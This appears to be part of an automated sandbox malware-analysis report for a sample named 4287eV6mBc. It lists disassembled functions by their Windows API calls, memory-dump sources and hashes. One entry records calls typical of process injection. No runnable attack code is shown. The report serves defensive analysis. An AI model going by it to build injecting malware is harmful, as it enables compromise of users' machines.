                                                      • Opcode ID: 0e1da1e9c77e060a796a84aff668ddc5be74013277bf78d451428514c8b30c3b
                                                      • Instruction ID: 8852f0fd74d927bc0ff623ea2fc1ce018b69f1db4da451c8982b67147459c9d7
                                                      • Opcode Fuzzy Hash: 0e1da1e9c77e060a796a84aff668ddc5be74013277bf78d451428514c8b30c3b
                                                      • Instruction Fuzzy Hash: 13F0A97158031E66DB18EE98EC11ADF7BAEDF01311F10441EF948A66C1DF709E50D5E5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __lock_file_memset
                                                      • String ID:
                                                      • API String ID: 26237723-0
                                                      • Opcode ID: c2e1c7bd9b3c4bcbdec7c46200fa8086128294bf112361fafc4a20c43b12e243
                                                      • Instruction ID: fc11b079bd14801008f864dce7557c5d4a62291525062dc5595fa633c1494cbe
                                                      • Opcode Fuzzy Hash: c2e1c7bd9b3c4bcbdec7c46200fa8086128294bf112361fafc4a20c43b12e243
                                                      • Instruction Fuzzy Hash: 6201D871880604EFCF55AF68CC029DF7B63AF51321F444119F4141B2E1DB328911DF95
                                                      APIs
                                                        • Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28
                                                      • __lock_file.LIBCMT ref: 006053EB
                                                        • Part of subcall function 00606C11: __lock.LIBCMT ref: 00606C34
                                                      • __fclose_nolock.LIBCMT ref: 006053F6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: 5864376b640db56201572ccb78a25a685146a65f3799eeff3f47e0bef92dccfb
                                                      • Instruction ID: 62ef55075ed653b9515469fe05885b3a0df2cd5a0435ea0054c386d75dcf93b3
                                                      • Opcode Fuzzy Hash: 5864376b640db56201572ccb78a25a685146a65f3799eeff3f47e0bef92dccfb
                                                      • Instruction Fuzzy Hash: EFF09631880A049EDB5CBB6598027AF76E26F41374F25820CA465AB1C1DBBC89415F69
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 00E9AECD
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00E9AEF1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00E9AF13
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384407868.0000000000E99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E99000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e99000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                      • Instruction ID: e1e7048da9f3f0c13eced10ec805011f03017a723ea6278cfea1360d049edc14
                                                      • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                      • Instruction Fuzzy Hash: A012CF24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CF5A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 65c7426d6053b9483c7ce4e321af8debd14d6724be661298eee7b7fd9577bf41
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 6731B574A401059BE71CDF58C484AAAF7A6FB59300F6887A5E80ACB395D731EDC1DBC0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 8929b53e7e3ffbaf377bb33f19fa18dc197dd686388b60e1cc99cebca8853555
                                                      • Instruction ID: 4ebb5534ecc5fc93e9b3b7d75b7409f3f52bf20f97a0b33c350e75615e65e598
                                                      • Opcode Fuzzy Hash: 8929b53e7e3ffbaf377bb33f19fa18dc197dd686388b60e1cc99cebca8853555
                                                      • Instruction Fuzzy Hash: F24116749043519FDB18DF25C444B1ABBE1BF85318F1988ACE8998B362C731EC45CF52
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: d736eb4b12a5ea1baa2c431ae8dec84721470949aeeaee0b894fa74c4b1786fc
                                                      • Instruction ID: e035d696b18014805ec61009a5971b7422a4960777325af4516c376c6799b323
                                                      • Opcode Fuzzy Hash: d736eb4b12a5ea1baa2c431ae8dec84721470949aeeaee0b894fa74c4b1786fc
                                                      • Instruction Fuzzy Hash: 66214872A04A0DEBDB188F16EC417AA7FBAFF18750F24846EE896C5090EB31C0D0D785
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 216dd6e1b00afa9364b781035f0fa7cff62e564949bf03eac8ca6fb0027d5b3b
                                                      • Instruction ID: 0b36d608bb678d0e42e8ea380a5fe304d50a6acba802300ab9013529a86741c5
                                                      • Opcode Fuzzy Hash: 216dd6e1b00afa9364b781035f0fa7cff62e564949bf03eac8ca6fb0027d5b3b
                                                      • Instruction Fuzzy Hash: 2D21F8390453816FE7325B74E8426D6BFA5FF42320F2584AFE8448B841F6708D4687A5
                                                      APIs
                                                        • Part of subcall function 005E4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 005E4BEF
                                                        • Part of subcall function 0060525B: __wfsopen.LIBCMT ref: 00605266
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,006A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005E4E0F
                                                        • Part of subcall function 005E4B6A: FreeLibrary.KERNEL32(00000000), ref: 005E4BA4
                                                        • Part of subcall function 005E4C70: _memmove.LIBCMT ref: 005E4CBA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                      • String ID:
                                                      • API String ID: 1396898556-0
                                                      • Opcode ID: e093f7cb983f4dc1dab18942cf9c832c7c5fc494fc8836bf87139d8dcbd10cc6
                                                      • Instruction ID: e1d284feb6025309d08cf315c09fa63ceddc2bbc55e3f55756437b12cafa60a7
                                                      • Opcode Fuzzy Hash: e093f7cb983f4dc1dab18942cf9c832c7c5fc494fc8836bf87139d8dcbd10cc6
                                                      • Instruction Fuzzy Hash: FB11E731600246ABCF18AF71C81AFAE7BADBF84710F10882DF581A7181DB719E009F51
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 77c2e79e06b3763547db7e6299b856f43c1f13791424f4ea19d8741ec2cf3376
                                                      • Instruction ID: 850c7479b517688083a7f22b3a5aac3a9fb8a4e005fd0fb91a319a7fb0b76044
                                                      • Opcode Fuzzy Hash: 77c2e79e06b3763547db7e6299b856f43c1f13791424f4ea19d8741ec2cf3376
                                                      • Instruction Fuzzy Hash: BF2102B4908342DFDB18DF24C844A2ABBE1BF88314F15896CF99A57762D731E805CB92
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 006048A6
                                                        • Part of subcall function 00608B28: __getptd_noexit.LIBCMT ref: 00608B28
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2597487223-0
                                                      • Opcode ID: 3ed0f91d0682690af5d9e4f969f9e60b80b474dd81712d5b5fa076559278916b
                                                      • Instruction ID: 7983979a5e1ffca6861b56cc3b8240a56b63a7e3643b3e311da8a36c761abe72
                                                      • Opcode Fuzzy Hash: 3ed0f91d0682690af5d9e4f969f9e60b80b474dd81712d5b5fa076559278916b
                                                      • Instruction Fuzzy Hash: 61F0D171880604EFDF69AF6488057DF36A2AF00320F058818B5209B1C1CF78C951DB55
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,006A52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 005E4E7E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 851c340194271ad04d652cdd95d139620104096cb833af19eaf4395c57b22e38
                                                      • Instruction ID: deacc7d422d3770a4178ceabdb6c5fcb9b903bac2050807c011890633c493fe4
                                                      • Opcode Fuzzy Hash: 851c340194271ad04d652cdd95d139620104096cb833af19eaf4395c57b22e38
                                                      • Instruction Fuzzy Hash: 47F03971505791CFCB389F66E494823BBE9BF143693248A7EE1D782620C7729840DF41
                                                      APIs
                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006007B0
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath_memmove
                                                      • String ID:
                                                      • API String ID: 2514874351-0
                                                      • Opcode ID: f890e76665c4c9b0900f129d862eb223be873004cc412428c4a2e84ff5080748
                                                      • Instruction ID: 296992953d3f9b7c3294e05f51901417c01e320512e884626b7ad1223eac230b
                                                      • Opcode Fuzzy Hash: f890e76665c4c9b0900f129d862eb223be873004cc412428c4a2e84ff5080748
                                                      • Instruction Fuzzy Hash: F6E0CD3690412857C720D7999C05FEA77DDDFCD7A0F0841B5FD0CD7204D9A09D8086D0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                      • Instruction ID: 3cad14653bd125ae654eef793b97441f0ef65ce3e07d3620aa747ff99630847a
                                                      • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                      • Instruction Fuzzy Hash: F4E092B0104B005FD7398A24D800BE373E2AB05304F00081DF2AA83341EB6278418B59
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: __wfsopen
                                                      • String ID:
                                                      • API String ID: 197181222-0
                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction ID: 966bf12c43d2a96f46cf07a79b0d8558e31ef2346848bb95419868be6b041d75
                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                      • Instruction Fuzzy Hash: 3CB0927648020C77CE012A82EC02A4A3B1A9B41764F408020FB0C181A2A673A6649A89
                                                      APIs
                                                      • Sleep.KERNELBASE(000001F4), ref: 00E9B6B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384407868.0000000000E99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E99000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e99000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction ID: 53bdca5f26547afd9dda18741adde57d788f8eeffbb731be172aef7777effddd
                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                      • Instruction Fuzzy Hash: EDE0E67494010EDFDB00EFB4D64969E7FB4EF04301F100161FD01E2281D7309D508A62
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0066CB37
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066CB95
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0066CBD6
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0066CC00
                                                      • SendMessageW.USER32 ref: 0066CC29
                                                      • _wcsncpy.LIBCMT ref: 0066CC95
                                                      • GetKeyState.USER32(00000011), ref: 0066CCB6
                                                      • GetKeyState.USER32(00000009), ref: 0066CCC3
                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066CCD9
                                                      • GetKeyState.USER32(00000010), ref: 0066CCE3
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0066CD0C
                                                      • SendMessageW.USER32 ref: 0066CD33
                                                      • SendMessageW.USER32(?,00001030,?,0066B348), ref: 0066CE37
                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0066CE4D
                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0066CE60
                                                      • SetCapture.USER32(?), ref: 0066CE69
                                                      • ClientToScreen.USER32(?,?), ref: 0066CECE
                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0066CEDB
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0066CEF5
                                                      • ReleaseCapture.USER32 ref: 0066CF00
                                                      • GetCursorPos.USER32(?), ref: 0066CF3A
                                                      • ScreenToClient.USER32(?,?), ref: 0066CF47
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0066CFA3
                                                      • SendMessageW.USER32 ref: 0066CFD1
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0066D00E
                                                      • SendMessageW.USER32 ref: 0066D03D
                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0066D05E
                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0066D06D
                                                      • GetCursorPos.USER32(?), ref: 0066D08D
                                                      • ScreenToClient.USER32(?,?), ref: 0066D09A
                                                      • GetParent.USER32(?), ref: 0066D0BA
                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0066D123
                                                      • SendMessageW.USER32 ref: 0066D154
                                                      • ClientToScreen.USER32(?,?), ref: 0066D1B2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0066D1E2
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0066D20C
                                                      • SendMessageW.USER32 ref: 0066D22F
                                                      • ClientToScreen.USER32(?,?), ref: 0066D281
                                                      • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0066D2B5
                                                        • Part of subcall function 005E25DB: GetWindowLongW.USER32(?,000000EB), ref: 005E25EC
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0066D351
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                      • String ID: @GUI_DRAGID$@U=u$F$HW
                                                      • API String ID: 3977979337-9653463
                                                      • Opcode ID: 7a111c76ba4ee901c65e9f1b1d6b64489f27de8cd3e0985d90326c478966eb32
                                                      • Instruction ID: c705fc3e92902fd19e9993b9df2a69aeb2909e510b6c2aa7d3e5824050a68dae
                                                      • Opcode Fuzzy Hash: 7a111c76ba4ee901c65e9f1b1d6b64489f27de8cd3e0985d90326c478966eb32
                                                      • Instruction Fuzzy Hash: FE42CC74604A81AFCB24DF24D858ABABBE6FF49320F140519F5A6D73B1C771E840DB92
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_memset
                                                      • String ID: ]i$3c_$DEFINE$P\i$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$__
                                                      • API String ID: 1357608183-1656013260
                                                      • Opcode ID: f0e8f2c07b420d4f4a8b842f7c48c41804d98ed8f81b5edb8e90c3ab4e7d78ec
                                                      • Instruction ID: bcc21eb8c0027f098d4ba44923ef5d30828a02acbfab5030b8c33a37d6ea3725
                                                      • Opcode Fuzzy Hash: f0e8f2c07b420d4f4a8b842f7c48c41804d98ed8f81b5edb8e90c3ab4e7d78ec
                                                      • Instruction Fuzzy Hash: 74939375A04219DBDB24CF58C891BFDB7B2FF48710F24856AE945AB381E7749E81CB80
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,?), ref: 005E48DF
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0061D665
                                                      • IsIconic.USER32(?), ref: 0061D66E
                                                      • ShowWindow.USER32(?,00000009), ref: 0061D67B
                                                      • SetForegroundWindow.USER32(?), ref: 0061D685
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0061D69B
                                                      • GetCurrentThreadId.KERNEL32 ref: 0061D6A2
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0061D6AE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0061D6BF
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 0061D6C7
                                                      • AttachThreadInput.USER32(00000000,?,00000001), ref: 0061D6CF
                                                      • SetForegroundWindow.USER32(?), ref: 0061D6D2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0061D6E7
                                                      • keybd_event.USER32(00000012,00000000), ref: 0061D6F2
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0061D6FC
                                                      • keybd_event.USER32(00000012,00000000), ref: 0061D701
